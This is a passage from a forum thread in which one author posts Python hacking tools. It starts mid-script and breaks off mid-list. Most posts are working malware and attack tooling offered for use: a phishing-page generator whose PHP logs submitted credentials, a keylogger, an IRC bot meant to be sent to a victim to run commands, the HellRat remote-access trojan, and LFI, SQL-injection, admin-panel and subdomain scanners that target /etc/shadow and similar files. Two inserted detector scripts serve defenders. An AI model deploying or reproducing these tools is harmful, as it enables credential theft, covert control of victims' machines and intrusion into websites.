 text ='<?php $file fopen("dump.txt""a");foreach($_POST as $uno => $dos) {fwrite($file$uno."=".$dos."\r\n");}foreach($_GET as $tres => $cuatro) {fwrite($file$tres."=".$cuatro."\r\n");}fclose($file);?>'
 print "[+] The fake was save in",new
 savefile(new,code+"\n\n"+text)
except:
 pass

header()

if len(sys.argv) != 3 :
show()

else :
gen(sys.argv[1],sys.argv[2])

copyright()

#The End




Usage example


C:/Users/DoddyH/Desktop/Arsenal X parte 2>phising.py http://127.0.0.1/login.php yeah.php



--== Phising Gen ==--


[+] Working in the phishing
[+] The fake was save in yeah.php


(C) Doddy Hackman 2010



#396
Scripting / [Python] LFI T00l
7 Octubre 2011, 01:38 AM
Hello everyone.

I just finished a tool to test for an LFI vulnerability; if the page
is vulnerable then the script automatically tries to brute-force files.

Código (python) [Seleccionar]

#!usr/bin/perl
#LFI T00l (C) Doddy Hackman

import os,sys,urllib2,re

files = ['../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.lo
g','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']

def header() :
print "\n--== LFI T00l ==--\n"

def copyright() :
print "\n\n(C) Doddy Hackman 2010\n"
exit(1)

def show() :
print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
return urllib2.urlopen(web).read()


def fuzz(web):
print "\n[+] Fuzzing files...\n"
for file in files:
 code = toma(web+file)
 if not (re.findall("No such file or directory in",code)):
  print "[File Found] : ",web,file
 


def test(web):
try:
 print "\n[+] Testing vulnerability LFI in",web
 code = toma(web+"'")
 if(re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)):
  fpd = re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)
  print "\n[+] LFI Detected"
  print "[+] Full Path discloure : ",fpd[0]
  fuzz(web)
 else:
  print "[-] LFI Not Found"
except:
 pass

header()

if len(sys.argv) != 2 :
show()

else :
test(sys.argv[1])

copyright()


#The End

Usage example


python lfi.py http://127.0.0.1/lfi.php?file=



C:\Users\DoddyH\Desktop\Arsenal X parte 2>lfi.py http://127.0.0.1/lfi.php?file=

--== LFI T00l ==--


[+] Testing vulnerability LFI in http://127.0.0.1/lfi.php?file=

[+] LFI Detected
[+] Full Path discloure :  C:\xampp\htdocs\lfi.php

[+] Fuzzing files...



(C) Doddy Hackman 2010
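The SQL Scanner, RFI Tester and LFI T00l above each leave a recognisable trail in a web server's access log: the "-1 union select" column probe, the K0BRA (0x4b30425241) marker wrapped in unhex(hex(concat(...))), the information_schema / mysql.user enumeration, a parameter whose value is a remote URL, and a lone quote followed by the file list. The Python 3 snippet below is an added defensive example, not code from any of the posts: it parses constructed Apache combined-log lines, normalises the three separators the scanners' bypass() helpers emit, and escalates only when one client's requests match a whole tool sequence; the rule names and the sample lines are my own.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed Apache combined-log sample (not captured traffic). Each request mirrors one
# step of the tools above: the "-1 union select" column probe, the K0BRA (0x4b30425241)
# marker wrapper, information_schema / mysql.user enumeration, the RFI tester's remote URL,
# and the LFI tool's quote probe followed by entries from its file list.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Oct/2011:01:40:12 -0300] "GET /news.php?id=-1+union+select+1-- HTTP/1.1" 200 1543 "-" "Mozilla/5.0"
10.0.0.5 - - [07/Oct/2011:01:40:13 -0300] "GET /news.php?id=-1+union+select+unhex(hex(concat(0x4b30425241,1,0x4b30425241))),unhex(hex(concat(0x4b30425241,2,0x4b30425241)))-- HTTP/1.1" 200 1610 "-" "Mozilla/5.0"
10.0.0.5 - - [07/Oct/2011:01:40:15 -0300] "GET /news.php?id=-1+union+select+1,unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))+from+mysql.user-- HTTP/1.1" 200 1601 "-" "Mozilla/5.0"
10.0.0.5 - - [07/Oct/2011:01:40:16 -0300] "GET /news.php?id=-1/**/union/**/select/**/1,unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))/**/from/**/information_schema.tables/**/limit/**/0,1/* HTTP/1.1" 200 1602 "-" "Mozilla/5.0"
10.0.0.9 - - [07/Oct/2011:01:41:02 -0300] "GET /rfi.php?index=http://www.supertangas.com HTTP/1.1" 200 2201 "-" "Python-urllib/2.7"
10.0.0.9 - - [07/Oct/2011:01:41:03 -0300] "GET /lfi.php?file=' HTTP/1.1" 200 310 "-" "Python-urllib/2.7"
10.0.0.9 - - [07/Oct/2011:01:41:04 -0300] "GET /lfi.php?file=../../../boot.ini HTTP/1.1" 200 412 "-" "Python-urllib/2.7"
10.0.0.9 - - [07/Oct/2011:01:41:05 -0300] "GET /lfi.php?file=/etc/passwd HTTP/1.1" 200 1200 "-" "Python-urllib/2.7"
192.168.1.20 - - [07/Oct/2011:01:42:00 -0300] "GET /news.php?id=42&sort=name HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Apache "combined" format: client, identity, user, [timestamp], "request", status, size,
# "referer", "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Rule names are this example's own labels. Patterns run against the normalized target.
RULES = (
    ("sqli-union-probe", re.compile(r"-1\s+union\s+select\b")),
    # K0BRA as hex, plus the char() encodings of ERTOR854 and RATSXPDOWN the Perl bot uses
    ("sqli-marker", re.compile(
        r"0x4b30425241|char\(69,82,84,79,82,56,53,52\)|char\(82,65,84,83,88,80,68,79,87,78")),
    ("sqli-schema-enum", re.compile(
        r"\b(?:information_schema\.(?:tables|columns|schemata)|mysql\.user)\b")),
    ("sqli-load-file", re.compile(r"\bload_file\s*\(")),
    ("rfi-remote-url", re.compile(r"[?&][^=&]+=https?://")),
    ("lfi-traversal", re.compile(r"(?:\.\./){2,}|/etc/(?:passwd|shadow)|boot\.ini")),
    ("error-quote-probe", re.compile(r"='(?:&|$)")),
)


def normalize(target):
    """Decode the request target the way the backend sees it: percent/plus decoding and the
    /**/ comment trick collapsed to a space, so one rule set covers all three separators the
    scanners' bypass() helpers emit ('+', '%20' and '/**/')."""
    decoded = unquote_plus(target)
    return re.sub(r"/\*\*/", " ", decoded).lower()


def classify(target):
    """Return the names of every rule the request target trips."""
    norm = normalize(target)
    return [name for name, rx in RULES if rx.search(norm)]


def analyze(log_text):
    """Parse combined-log lines; return per-request hits and the set of rules seen per client."""
    hits, by_ip = [], defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        names = classify(m.group("target"))
        if names:
            hits.append((m.group("ip"), m.group("target"), names))
            by_ip[m.group("ip")].update(names)
    return hits, dict(by_ip)


def scanner_verdicts(rule_names):
    """Escalate when a client's combined rule set matches a tool's full sequence rather than
    a single odd request: union probe plus marker is the SQL scanner's column search, quote
    probe plus traversal is the LFI tool's detect-then-fuzz flow."""
    names, verdicts = set(rule_names), []
    if {"sqli-union-probe", "sqli-marker"} <= names:
        verdicts.append("sqli-scanner-sequence")
    if {"error-quote-probe", "lfi-traversal"} <= names:
        verdicts.append("lfi-tool-sequence")
    if "rfi-remote-url" in names:
        verdicts.append("rfi-probe")
    return verdicts


if __name__ == "__main__":
    found, per_client = analyze(SAMPLE_LOG)
    for ip, target, names in found:
        print(ip, target, ",".join(names))
    for ip, names in per_client.items():
        print(ip, "->", scanner_verdicts(names) or ["isolated requests"])
```

The per-client grouping is what keeps a single "-1 union select" from a curious user out of the alert queue while the scanner's probe-then-marker pair still fires.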

#397
Scripting / [Python] Simple Keylogger
7 Octubre 2011, 01:38 AM
A simple keylogger in Python

Código (python) [Seleccionar]

#!usr/bin/python
#Simple Keylogger in Python
#(C) Doddy Hackman 2011

import pyHook,pythoncom


def savefile(name,text):
file = open(name,"a")
file.write(text+"\n")
file.close()

def toma(frase):
savefile("logs.txt",frase.Key)

def capturar():
nave = pyHook.HookManager()
nave.KeyDown = toma
nave.HookKeyboard()
pythoncom.PumpMessages()

while 1:
capturar()

# The End

#398
Scripting / [Python] IRC Bot
7 Octubre 2011, 01:37 AM
Hello everyone.

Here I bring you an IRC bot in Python to use as a hidden server and send
to a victim so you can control it from a command in an IRC channel

The key command for sending commands, whose result is then shown
in the chat, is


cmdnow TUCOMANDO


Código (python) [Seleccionar]
#!usr/bin/python
#Insane Bot (C) Doddy Hackman 2011
#Version beta 0.00001

import re,socket
import subprocess

host = "127.0.0.1"
canal = "#locos"
nick = "bot"

irc = socket.socket()
try:
irc.connect((host,6667))
irc.send("NICK "+nick+"\r\n")
irc.send("USER "+nick+" 1 1 1 1\r\n")
irc.send("JOIN "+canal+"\r\n")
print "[+] Insane Bot Online\n"
while 1:
 code = irc.recv(9999)
 if re.findall("PING",code):
  irc.send("PONG "+code.split()[1]+"\r\n")
 if re.findall("PRIVMSG",code):
  nick = code.split("!")
  nick = nick[0].replace(":","")
  msg = code.split(":")[2:][0]
  if re.findall("cmdnow",code):
   cmd = code.split("cmdnow")[1]
   irc.send("PRIVMSG "+canal+" : [+] Loading command : "+cmd+"\n")
   rea = subprocess.Popen(cmd,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
   if rea:
    re1 = rea.stdout.read()
    total = re1.replace("\n","|")
    irc.send("PRIVMSG "+canal+" : "+total+"\n")
   else:
    re2 = rea.stderr.read()
    total = re2.replace("\n","|")
    irc.send("PRIVMSG "+canal+" : "+total+"\n")
   
 
except:
print "\n\n[-] Error\n\n"


# The End
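Both bots on this page talk over plain IRC PRIVMSG, which is exactly where an IRC server log or a network sensor can see them: the Python bot reacts to "cmdnow" anywhere in a line, echoes "[+] Loading command :" and flattens the command output with "|", while the Perl bot at the top reports "[Page] :", "[+] Injection SQL :" and "[+] Scan Finished" to its channel. The Python 3 snippet below is an added defensive example, not code from the posts: it parses a constructed IRC trace, tags those indicators, and correlates each "cmdnow" line with the reply that follows it so the controlled nick, its host and the commands it received come out as one record; nicks, hosts, the channel and the indicator names are made up.

```python
import re

# Constructed IRC trace as a server or network sensor would record it (not captured traffic).
# Framing follows RFC 1459: ":nick!user@host PRIVMSG <target> :<text>". The "cmdnow" line is
# the Python bot's trigger word, "[+] Loading command :" is its echo, the "|"-joined line is
# how it flattens command output, and the "[Page] / [+] Injection SQL" lines mirror the Perl
# bot's channel reporting. Nicks, hosts and the channel are made up.
SAMPLE_IRC = """\
:operator!op@10.0.0.2 PRIVMSG #locos :cmdnow whoami
:bot!bot@192.168.1.77 PRIVMSG #locos : [+] Loading command :  whoami
:bot!bot@192.168.1.77 PRIVMSG #locos : desktop-77\\victim|
:alice!alice@10.0.0.3 PRIVMSG #locos :anyone seen the new build?
:operator!op@10.0.0.2 PRIVMSG #locos :cmdnow dir
:bot!bot@192.168.1.77 PRIVMSG #locos : [+] Loading command :  dir
:bot!bot@192.168.1.77 PRIVMSG #locos :  Volume in drive C has no label.| Directory of C:\\Users\\victim|03/10/2011  10:12    <DIR>          .|
:bot!bot@192.168.1.77 PRIVMSG #locos : [Page] : http://example.test/news.php?id=
:bot!bot@192.168.1.77 PRIVMSG #locos : [+] Injection SQL : http://example.test/news.php?id=-1+union+select+1,hackman,3
:bot!bot@192.168.1.77 PRIVMSG #locos : [+] Scan Finished
:bob!bob@10.0.0.4 PRIVMSG #locos :lol
"""

PRIVMSG_RE = re.compile(
    r"^:(?P<nick>[^!\s]+)!(?P<user>[^@\s]+)@(?P<host>\S+) PRIVMSG (?P<target>\S+) :(?P<text>.*)$")

# Indicator names are this example's own labels.
INDICATORS = (
    # the bot triggers on "cmdnow" anywhere in the raw line, so match it anywhere too
    ("c2-command", re.compile(r"cmdnow")),
    ("bot-command-echo", re.compile(r"\[\+\] Loading command :")),
    ("bot-sqli-report", re.compile(
        r"\[(?:Page|Limit|Data|Full Path Discloure)\] :|\[\+\] Injection SQL :|\[\+\] Scan Finished")),
    # output lines arrive with every newline replaced by "|", so they end in "|"
    ("bot-output-line", re.compile(r"\|\s*$")),
)


def tag_message(text):
    """Return the indicator names a single PRIVMSG text trips."""
    return [name for name, rx in INDICATORS if rx.search(text)]


def analyze_irc(trace):
    """Walk the trace in order and correlate: a nick that answers a 'cmdnow' line in the same
    channel with the bot's echo is recorded as a controlled host, together with the nick that
    issued the command and the commands it was given."""
    findings, pending, bots = [], {}, {}
    for line in trace.splitlines():
        m = PRIVMSG_RE.match(line)
        if not m:
            continue
        nick, host, chan, text = m.group("nick", "host", "target", "text")
        tags = tag_message(text)
        if "c2-command" in tags:
            # same split the bot performs: everything after the keyword is the command
            pending[chan] = (nick, text.split("cmdnow", 1)[1].strip())
        elif "bot-command-echo" in tags and chan in pending:
            operator, command = pending.pop(chan)
            entry = bots.setdefault(nick, {"host": host, "operator": operator, "commands": []})
            entry["commands"].append(command)
        if tags:
            findings.append((nick, chan, tags))
    return findings, bots


if __name__ == "__main__":
    events, controlled = analyze_irc(SAMPLE_IRC)
    for nick, chan, tags in events:
        print(f"{chan} {nick}: {','.join(tags)}")
    for nick, info in controlled.items():
        print(f"controlled host {nick} ({info['host']}) driven by {info['operator']}: {info['commands']}")
```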
#399
Scripting / [Python] HTTP Console By Doddy H
7 Octubre 2011, 01:37 AM
Well, this is a simple Python program made with Tk that lets you send
web requests to a specific server


Código (python) [Seleccionar]
#!usr/bin/python
#Console (C) Doddy Hackman 2011

from Tkinter import *
import socket

global x,socket

def execa() :


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((str(host.get()),80))
s.send(cmd.get()+"\r\n")
data = s.recv(666)
s.close()
panel.insert(END,repr(data))

 

window = Tk()
window.title("HTTP Console (C) Doddy Hackman 2011")

window.maxsize(width="400",height="350")
window.minsize(width="400",height="350")

window.configure(background="black")
window.configure(cursor="tcross")

host = StringVar()
cmd = StringVar()

panel = Text(window,width=30,height=15,bg="black",fg="red")

Label(window,bg="black").grid(row=3)

Label(window,text="Host : ",bg="black",fg="red").grid(row=4,column=4)
entry = Entry(window,width=35,textvariable=host,bg="black",fg="red").grid(row=4,column=5)

Label(window,text="Command : ",bg="black",fg="red").grid(row=8,column=4)
entry = Entry(window,width=35,textvariable=cmd,bg="black",fg="red").grid(row=8,column=5)

Button(text="Cargar",bg="black",fg="red",activebackground="red",command=execa).grid(row=8,column=9)


Label(window,bg="black").grid(row=19)
panel.grid(row=20,column=5)


window.mainloop()


#400
Scripting / [Python] HellRat By Doddy H
7 Octubre 2011, 01:37 AM
Hi, here I bring a trojan in Python with the following
options

  • Hide Start
  • Show Start
  • Hide taskbar
  • Show taskbar
  • Open CD
  • Close CD
  • Run commands
  • Show information

    server.py

    Código (python) [Seleccionar]

    #!usr/bin/python
    #Hell RAt (C) Doddy Hackman 2011

    import socket,os,re,win32api,win32gui,win32con,ctypes,subprocess

    print "\n\n[+] Online\n\n"

    slave = socket.socket()
    slave.bind(("",666))
    slave.listen(999)

    a,b = slave.accept()

    while True:
    rex = a.recv(20)
    if re.findall("getso",rex):
     z = os.name
     a.send(z)
    if re.findall("getpath",rex):
     h = os.getcwd()
     a.send(h)
    if re.findall("ocultarinicio",rex):
     x = win32gui.FindWindow("Shell_TrayWnd","")
     win32gui.ShowWindow(x,win32con.SW_HIDE)
    elif re.findall("mostrarinicio",rex):
     x = win32gui.FindWindow("Shell_TrayWnd","")
     win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL)
    elif re.findall("ocultaricono",rex):
     x = win32gui.FindWindow(0,"Program Manager")
     win32gui.ShowWindow(x,win32con.SW_HIDE)
    elif re.findall("mostraricono",rex):
     x = win32gui.FindWindow(0,"Program Manager")
     win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL)
    elif re.findall("abrircd",rex):
     ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door open", None, 0, None)
    elif re.findall("cerrarcd",rex):
     ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door closed", None, 0, None)
    else:
     rea = subprocess.Popen(rex,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
     if re:
      a.send(rea.stdout.read())
     else:
      a.send(rea.stderr.read())


    # The End  


    cliente.py

    Código (python) [Seleccionar]

    #!usr/bin/python
    #HellRat (C) Doddy Hackman 2011

    import os,socket,sys

    def head():
    print "\n\n-- == hELLrAT == --\n\n"

    def copyright():
    print "\n\n(C) Doddy Hackman 2011\n\n"

    def clean():
    if sys.platform=="win32":
     os.system("cls")
    else:
     os.system("clear")

    def men():

    try:
     ip = raw_input("[+] IP : ")
     client = socket.socket()
     client.connect((ip,666))
     while True:
      clean()
      print "\n\n[+] Welcome to ",ip,"\n\n"
      print "\n\n[1] Informacion"
      print "[2] CMD"
      print "[3] Abrir CD"
      print "[4] Cerrar CD"
      print "[5] Ocultar iconos"
      print "[6] Mostrar iconos"
      print "[7] Ocultar barra de tareas"
      print "[8] Mostrar barra de tareas"
      print "[9] Cambiar IP"
      print "[10] Salir"
      op = input("\n\n[Opcion] : ")
      if op == 1:
       print "\n\n[+] Informacion\n\n"
       client.send("getso")
       so = client.recv(999)
       client.send("getpath")
       path = client.recv(999)
       print "[+] SO : "+so  
       print "[+] Path : "+path
       raw_input()
      if op == 2:
       cmd = raw_input("\n[CMD] : ")
       client.send(cmd)
       code = client.recv(999)
       print code
       raw_input()
      if op == 3:
       client.send("abrircd")
      if op == 4:
       client.send("cerrarcd")
      if op == 5:
       client.send("ocultaricono")
      if op == 6:
       client.send("mostraricono")
      if op == 7:
       client.send("ocultarinicio")
      if op == 8:
       client.send("mostrarinicio")
      if op == 9:
       men()
      if op == 10:
       client.close()
       copyright()
       raw_input()
       sys.exit(1)
    except:
     print "\n\n[-] Error\n\n"
    head()
    men()

    # The End
#401
Scripting / [Python] Google Inyector By dODDY h
7 October 2011, 01:36 AM
Well, I just made an SQLi scanner.

It searches Google for pages matching a dork you specify, then removes duplicates and scans the sites it found.



Code (python):
#!usr/bin/python
#Google Iny (C) Doddy Hackman 2011


import urllib2,re,os,sys


def head():
print "\n\n -- == Google Iny == --\n"

def copyright():
print "\n(C) Doddy Hackman 2011\n"
sys.exit(1)


def toma(web) :
nave = urllib2.Request(web)
nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
op = urllib2.build_opener()
return op.open(nave).read()


def show():
print "\n[+] Sintax : ",sys.argv[0]," <dork> <count>\n"

def limpiar(pag):

limpia = []
for p in pag:
 if not (re.findall("http://www.google.com.ar",p,re.I)):
  if p not in limpia:
   limpia.append(p)
return limpia


def sql(webs):
for web in webs :
 if re.findall("=",web):
  web = re.split("=",web)
  web = web[0]+"="
  try:
   code = toma(web+"-1+union+select+1--")
   if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
    print "[SQLI] : ",web,"\n"
  except:
   pass

def scan(dork,count):
pag = []
s = 10  
while s <= int(count):
 try:
  code = toma("http://www.google.com.ar/search?hl=&q="+str(dork)+"&start="+repr(s))
  d = re.findall("(?<=\"r\"><. href=\")[^\"]+",code)
  s += 10
  for a in d:
   pag.append(a)
 except:
  copyright()
pag = limpiar(pag)

return pag

head()

if len(sys.argv) != 3:
show()
else :
print "\n[+] SQL Scan Started\n"
print "[+] Dork : ",sys.argv[1]
print "[+] Count : ",sys.argv[2]
pages = scan(sys.argv[1],sys.argv[2])
print "\n[+] Webs Found : ",len(pages),"\n"
sql(pages)

copyright()
#402
Scripting / [Python] Fuzz DNS By Doddy H
7 October 2011, 01:34 AM
Hello everyone.

Here is a simple DNS finder: you just enter the domain and this little thing takes care of finding them.


Code (python):
#!usr/bin/python
#LFI T00l (C) Doddy Hackman

import os,sys,urllib2,re

dns = ['www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc']

def header() :
print "\n--== Fuzz DNS ==--\n"

def copyright() :
print "\n\n(C) Doddy Hackman 2010\n"
exit(1)

def show() :
print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
return urllib2.urlopen(web).read()


def search(web):
print "\n[+] Searching DNS in",web,"\n"
try:
 for d in dns:
  toma("http://"+d+"."+web)
  print "[DNS Link] : http://"+d+"."+web
except:
 pass

header()

if len(sys.argv) != 2 :
show()

else :
search(sys.argv[1])

copyright()


#The End


Usage example



C:/Users/dODDYh/Desktop/Arsenal X parte 2>fuzzdns.py google.com


--== Fuzz DNS ==--


[+] Searching DNS in google.com

[DNS Link] : http://www.google.com

(C) Doddy Hackman 2010





#403
Scripting / [Python] FTP Manager
7 October 2011, 01:34 AM
Hello

Here is a simple FTP client

Code (python):

#!/usr/bin/python
#FTP Manager 0.2 (C) Doddy Hackman 2011

from ftplib import FTP
import sys


def head():
    print "\n -- == FTP Manager == --\n\n"

def copyright():
    print "\n\n(C) Doddy Hackman 2011\n"
    sys.exit(1)

def show():
    print "\nSintax : "+sys.argv[0]+" <host> <user> <pass>\n"

def menu():
    print "\n"
    print "1 : dir"
    print "2 : cwd"
    print "3 : chdir"
    print "4 : delete dir"
    print "5 : delete file"
    print "6 : rename file"
    print "7 : make directory"
    print "8 : size"
    print "9 : abort\n\n"
    # int(raw_input()) instead of input(): input() evaluates whatever is typed
    try:
        return int(raw_input("[Option] : "))
    except ValueError:
        return 0


def enter(host,user,password):
    print "[+] Connecting to ",host,"\n"
    ftp = FTP(host,user,password)   # connects and logs in
    print "\n[+] Enter in the system\n"

    # loop over the menu instead of recursing into menu2() after every command
    while True:
        op = menu()
        try:
            if op == 1:
                ftp.dir()   # dir() prints the listing itself and returns None
            elif op == 2:
                print "\n\n[+] Path : "+ftp.pwd()+"\n\n"
            elif op == 3:
                path = raw_input("\n\n[Directory] : ")
                ftp.cwd(path)
                print "\n\n[+] Directory Changed\n\n"
            elif op == 4:
                path = raw_input("\n\n[Directory] : ")
                ftp.rmd(path)
                print "\n\n[+] Directory Deleted\n\n"
            elif op == 5:
                path = raw_input("\n\n[File] : ")
                ftp.delete(path)
                print "\n\n[+] File Deleted\n\n"
            elif op == 6:
                oldfile = raw_input("\n\n[Name] : ")
                newfile = raw_input("\n[New Name] : ")
                ftp.rename(oldfile,newfile)
                print "\n\n[+] Name Changed\n\n"
            elif op == 7:
                path = raw_input("\n\n[New Directory] : ")
                ftp.mkd(path)
                print "\n\n[+] Directory Created\n\n"
            elif op == 8:
                path = raw_input("\n\n[File] : ")
                peso = ftp.size(path)   # SIZE answers in bytes, not KB
                print "\n\n[+] ",peso," bytes \n\n"
            elif op == 9:
                ftp.quit()
                copyright()
        except Exception, e:
            # a failed FTP command (bad path, no permission) just returns to the menu
            print "\n\n[-] Error : ",e,"\n\n"


head()

if len(sys.argv) != 4:
    show()
else:
    enter(sys.argv[1],sys.argv[2],sys.argv[3])

copyright()
#404
Scripting / [Python] Finder Admin By Doddy H
7 October 2011, 01:33 AM
Hello everyone.

Today I finished a Python script to look for the famous administration panel.

Code (python):

#!usr/bin/python
#Finder Admin (C) Doddy Hackman

import sys,httplib,os

os.system("cls")

panels=['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php
','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','p